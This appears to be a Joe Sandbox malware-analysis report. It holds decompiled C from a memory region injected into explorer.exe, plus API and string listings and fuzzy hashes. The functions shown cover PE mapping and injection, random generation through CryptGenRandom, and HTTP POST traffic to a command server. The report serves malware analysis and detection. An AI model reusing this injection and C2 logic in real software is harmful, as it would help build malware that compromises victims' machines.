                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_v44 = __edx;
                                                                                                                                                                                              				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                                              					E02F8F0DE(0x1f4);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                                                                                                              				_t83 =  *_t12 + _t157;
                                                                                                                                                                                              				_v28 = _t138;
                                                                                                                                                                                              				_v40 = _t83;
                                                                                                                                                                                              				if( *_t83 != 0x4550) {
                                                                                                                                                                                              					L14:
                                                                                                                                                                                              					_t158 = _v12;
                                                                                                                                                                                              					L15:
                                                                                                                                                                                              					if(_v8 != _t138) {
                                                                                                                                                                                              						_t90 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                                                                                                              						_v8 = _t138;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L17:
                                                                                                                                                                                              					if(_v16 != 0) {
                                                                                                                                                                                              						_t87 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						_t160 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                              						_t85 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              						 *((intOrPtr*)(_t85 + 0x20))(_v20);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(_t138);
                                                                                                                                                                                              				_push(0x8000000);
                                                                                                                                                                                              				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                                                                                                              				_push(0x40);
                                                                                                                                                                                              				_push( &_v52);
                                                                                                                                                                                              				_push(_t138);
                                                                                                                                                                                              				_push(0xe);
                                                                                                                                                                                              				_push( &_v20);
                                                                                                                                                                                              				_t95 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t97 =  *"18293"; // 0x39323831
                                                                                                                                                                                              				_v36 = _t97;
                                                                                                                                                                                              				_t98 =  *0x2f9ce44; // 0x33
                                                                                                                                                                                              				_v32 = _t98;
                                                                                                                                                                                              				_v116.lpszClassName =  &_v64;
                                                                                                                                                                                              				asm("movsd");
                                                                                                                                                                                              				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                                              				_v116.cbWndExtra = _t138;
                                                                                                                                                                                              				asm("movsd");
                                                                                                                                                                                              				_v116.style = 0xb;
                                                                                                                                                                                              				_v116.lpszMenuName = _t138;
                                                                                                                                                                                              				_v116.cbSize = 0x30;
                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                              				_v116.cbClsExtra = _t138;
                                                                                                                                                                                              				_v116.hInstance = _t138;
                                                                                                                                                                                              				if(RegisterClassExA( &_v116) != 0) {
                                                                                                                                                                                              					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                                                                                                              					if(_t132 != 0) {
                                                                                                                                                                                              						DestroyWindow(_t132);
                                                                                                                                                                                              						UnregisterClassA( &_v64, _t138);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t162 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              				_t105 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
                                                                                                                                                                                              				_t158 = _v12;
                                                                                                                                                                                              				if(_t107 < 0) {
                                                                                                                                                                                              					goto L15;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(0x40);
                                                                                                                                                                                              					_push(_t138);
                                                                                                                                                                                              					_push(2);
                                                                                                                                                                                              					_push( &_v24);
                                                                                                                                                                                              					_push(_t138);
                                                                                                                                                                                              					_push(_t138);
                                                                                                                                                                                              					_push(_t138);
                                                                                                                                                                                              					_push( &_v8);
                                                                                                                                                                                              					_t110 =  *0x2f9f918; // 0x0
                                                                                                                                                                                              					_push(_t158);
                                                                                                                                                                                              					_push(_v20);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t154 = E02F88C43( *0x2f9f81c, 0x1ac4);
                                                                                                                                                                                              					_v36 = _t154;
                                                                                                                                                                                              					if(_t154 == 0) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                                              					_t113 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                                              					_t145 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                                              					E02F88BF4( &_v36, 0x1ac4);
                                                                                                                                                                                              					_t119 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_t155 =  *0x2f9f830; // 0x2f80000
                                                                                                                                                                                              					_v36 = _t119;
                                                                                                                                                                                              					 *0x2f9f830 = _v8;
		 *0x2f9f81c = _t163;
		E02F88CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
		E02F8D3C6(_v16, _v8, _v44);
		_t124 = E02F8A43D("quatr");
		_v53 = _t138;
		_t147 = 0xf;
		if(_t124 > _t147) {
			do {
				L12:
				_t63 = _t138 + 0x41; // 0x41
				 *((char*)(_t165 + _t138 - 0x40)) = _t63;
				_t138 =  &(_t138->i);
			} while (_t138 < _t147);
			L13:
			lstrlenW( &_v68);
			 *0x2f9f830 = _t155;
			 *0x2f9f81c = _v36;
			goto L17;
		}
		_t147 = _t124;
		if(_t147 == 0) {
			goto L13;
		}
		goto L12;
	}
}

APIs
• RegisterClassExA.USER32(?), ref: 02F8D50D
• CreateWindowExA.USER32 ref: 02F8D538
• DestroyWindow.USER32(00000000), ref: 02F8D543
• UnregisterClassA.USER32 ref: 02F8D54E
  • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
• lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,02F861C5), ref: 02F8D678
Strings
Memory Dump Source
• Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
Yara matches
Similarity
• API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
• String ID: 0$18293$aeroflot$quatr
• API String ID: 1751977465-2640591812
                                                                                                                                                                                              • Opcode ID: cfabc9ebcbd863e72d5de5913e47180a5b257ea2d53e8e511f38c3124a0dd551
                                                                                                                                                                                              • Instruction ID: 2c5213ef25bb384c61780e3164472d6ea58ac24354744be88e860e7e4cb04730
                                                                                                                                                                                              • Opcode Fuzzy Hash: cfabc9ebcbd863e72d5de5913e47180a5b257ea2d53e8e511f38c3124a0dd551
                                                                                                                                                                                              • Instruction Fuzzy Hash: B081D5B1E4021DAFDB10DFA5D884EEEBBB8FB08784F14456AE605E7290D7709A11CF64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E02F928F0(intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				_Unknown_base(*)()* _t15;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                              				_v12 = _t15;
                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(0xf0000000);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				if( *_t25() == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                              				 *_t29(_v8, 0);
                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_a4 = E02F9284B( &_v16);
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,02F87B6A), ref: 02F92902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 02F9291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 02F92928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 02F92937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 12e9fb44c1d4df58693b57b51e93464854f3a53cb0be50e24daf3463671b2cf8
                                                                                                                                                                                              • Instruction ID: 5c077173e255a03dac07b60a2c4845efb49cf73c9599822d193e8095f8a6d3f4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e9fb44c1d4df58693b57b51e93464854f3a53cb0be50e24daf3463671b2cf8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49118232E4130A7BFF1597B58C51F9EF7AC9F84AD4F160065EB01F2150DBB1DA0196A4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F8F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				int _v68;
                                                                                                                                                                                              				void* _v72;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				int _v96;
                                                                                                                                                                                              				void* _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E02F89DD8(0xd62);
				_v52 = E02F89DD8(0x8e9);
				_v48 = E02F89DD8(0xa93);
				_v44 = E02F89DD8(0x9a9);
				_t94 = E02F89DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E02F88D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E02F8A43D(_t190));
				_t102 =  *0x2f9f838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x2f9f838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x2f9f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E02F8F73E(_t189);
							_t110 =  *0x2f9f838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E02F8A065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x2f9f838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E02F8A065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E02F8F6EC(_t116);
									}
									_t117 = E02F89DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x2f9f838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E02F8A43D(_t193), _a4, _a8);
									E02F88B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E02F8A065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E02F88D6D( &_v20, 0, _t122);
										_t127 =  *0x2f9f838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E02F89F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x2f9f838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x2f9f838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x2f9f838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x2f9f838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x2f9f838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x2f9f838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                                              										_t194 = _v8;
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t153 =  *0x2f9f838; // 0x0
                                                                                                                                                                                              									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                                              									_t155 =  *0x2f9f838; // 0x0
                                                                                                                                                                                              									_t165 = 0;
                                                                                                                                                                                              									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                                              									_t189 = 0;
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									goto L22;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								GetLastError();
                                                                                                                                                                                              								_t159 =  *0x2f9f838; // 0x0
                                                                                                                                                                                              								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                                              								L21:
                                                                                                                                                                                              								_t189 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						L22:
                                                                                                                                                                                              						_t186 = _t194;
                                                                                                                                                                                              						_t104 = _v12 + 1;
                                                                                                                                                                                              						_v12 = _t104;
                                                                                                                                                                                              						__eflags = _t104 - 2;
                                                                                                                                                                                              					} while (_t104 < 2);
                                                                                                                                                                                              					__eflags = _t186;
                                                                                                                                                                                              					if(_t186 != 0) {
                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t195 = 0xfffffffe;
                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t163 = 0xfffffffc;
                                                                                                                                                                                              				return _t163;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x02f8fa56
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9d2
                                                                                                                                                                                              0x02f8f9d2
                                                                                                                                                                                              0x02f8f9d8
                                                                                                                                                                                              0x02f8f9de
                                                                                                                                                                                              0x02f8f9e1
                                                                                                                                                                                              0x02f8f9e6
                                                                                                                                                                                              0x02f8f9eb
                                                                                                                                                                                              0x02f8f9ee
                                                                                                                                                                                              0x02f8f9f3
                                                                                                                                                                                              0x02f8f9f3
                                                                                                                                                                                              0x02f8f9f6
                                                                                                                                                                                              0x02f8f9f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9f9
                                                                                                                                                                                              0x02f8f958
                                                                                                                                                                                              0x02f8f958
                                                                                                                                                                                              0x02f8f95e
                                                                                                                                                                                              0x02f8f964
                                                                                                                                                                                              0x02f8f967
                                                                                                                                                                                              0x02f8f96c
                                                                                                                                                                                              0x02f8f96f
                                                                                                                                                                                              0x02f8f972
                                                                                                                                                                                              0x02f8f974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f974
                                                                                                                                                                                              0x02f8f900
                                                                                                                                                                                              0x02f8f900
                                                                                                                                                                                              0x02f8f906
                                                                                                                                                                                              0x02f8f90c
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f8fe
                                                                                                                                                                                              0x02f8f8bf
                                                                                                                                                                                              0x02f8f9fe
                                                                                                                                                                                              0x02f8fa01
                                                                                                                                                                                              0x02f8fa03
                                                                                                                                                                                              0x02f8fa06
                                                                                                                                                                                              0x02f8fa09
                                                                                                                                                                                              0x02f8fa09
                                                                                                                                                                                              0x02f8fa12
                                                                                                                                                                                              0x02f8fa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8fa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8fa18
                                                                                                                                                                                              0x02f8f88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 02F8F7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 02F8F7E8
                                                                                                                                                                                                • Part of subcall function 02F88D6D: memset.MSVCRT ref: 02F88D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 02F8F8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 7bf736be38ac4b6439bc2acf7891c98ac497f041c97159ecbfdb17be8fb4daa2
                                                                                                                                                                                              • Instruction ID: e9448a1d667e8ec2c60cbbb6a0485732b89ee1ffd6d7a62d8e4b0501db1d742d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bf736be38ac4b6439bc2acf7891c98ac497f041c97159ecbfdb17be8fb4daa2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BA16D72E00218AFDB11EFA4DC48EAEF7B9EF48390F144569EA05E7260DB749A51CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 0fc338173fd181f0765d5822796810c69c2952ba6ab4e0ba776c1bde3137a503
                                                                                                                                                                                              • Instruction ID: 0d52ad7dcd8302c7e5e4dca3a7d5fc71ee92069d4b679b2bb764f18f1e077c5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc338173fd181f0765d5822796810c69c2952ba6ab4e0ba776c1bde3137a503
                                                                                                                                                                                              • Instruction Fuzzy Hash: BEE14A7290020BBBFF119F64CD45FAB3B69EF053C4F048429FE1996240E771DA618BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E02F850B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                              				void _v532;
                                                                                                                                                                                              				char _v548;
                                                                                                                                                                                              				char _v580;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				signed int _v588;
                                                                                                                                                                                              				intOrPtr _v592;
                                                                                                                                                                                              				WCHAR* _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				intOrPtr _v604;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                              				char _t63;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                              				WCHAR* _t84;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                              				signed char _t104;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				WCHAR* _t115;
                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                              				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x2f9f81c; // 0x2fb0000
					_t110 =  *0x2f9f820; // 0x508f8b8
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))));
				}
				if(E02F8C9F4(_t173) != 0) {
					L4:
					_t56 = E02F8C6CE();
					_push(_t113);
					_v592 = _t56;
					E02F8C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E02F85072( &_v580,  &_v580, _t190);
					_t126 = E02F8E2C5( &_v580, E02F8A43D( &_v580), 0);
					E02F8C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E02F8317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x2f9c9a0);
						_t115 = E02F89A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x2f9f81c; // 0x2fb0000
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E02F898BD(_v600);
								_t130 = _t115;
								 *0x2f9f8d8 = _t66;
								 *0x2f9f8d0 = E02F898BD(_t130);
								L17:
								_push(_t130);
								_t174 = E02F8A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x2f9c9f2);
								_t163 = 0xe;
								E02F8AAA3(_t163, _t192);
								E02F8AADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E02F8AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E02F8B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E02F8B025(_t166, _t192);
								}
								_t76 = E02F8A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E02F8AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x2f9f81c; // 0x2fb0000
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E02F90D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x2f9f81c; // 0x2fb0000
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
